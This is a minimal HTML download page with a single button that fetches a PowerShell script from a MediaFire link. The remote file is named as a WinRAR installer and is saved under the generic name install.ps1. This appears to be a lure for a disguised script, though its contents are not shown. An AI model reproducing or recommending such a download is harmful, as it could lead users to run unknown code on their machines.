<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download PowerShell Script</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 50px;
            background-color: #f4f4f4;
        }
        h1 {
            color: #333;
        }
        button {
            padding: 15px 30px;
            font-size: 18px;
            cursor: pointer;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            margin-top: 20px;
        }
        button:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>

    <h1>Click the button to download the install.ps1 script</h1>

    <!-- The Download Button -->
    <a href="https://download1531.mediafire.com/poo0jjenzefghpZfQWz65f2Lvhjbo9IntCqE86jm5iax99mRRrMkFa7YbwpxvThBzVQ3sMSBUfygFfEyJX8wmashypcByM171Qk2FiNIF9HP6CXJpvfwI4nEhK39fKBSV1jfoofRd_m2ItwP5r8tETXp6Q6g0vWTXpJbWE64/hpqb89i9m8f99cx/winrar+installer.ps1" download="install.ps1">
        <button>Download Script</button>
    </a>

</body>
</html>
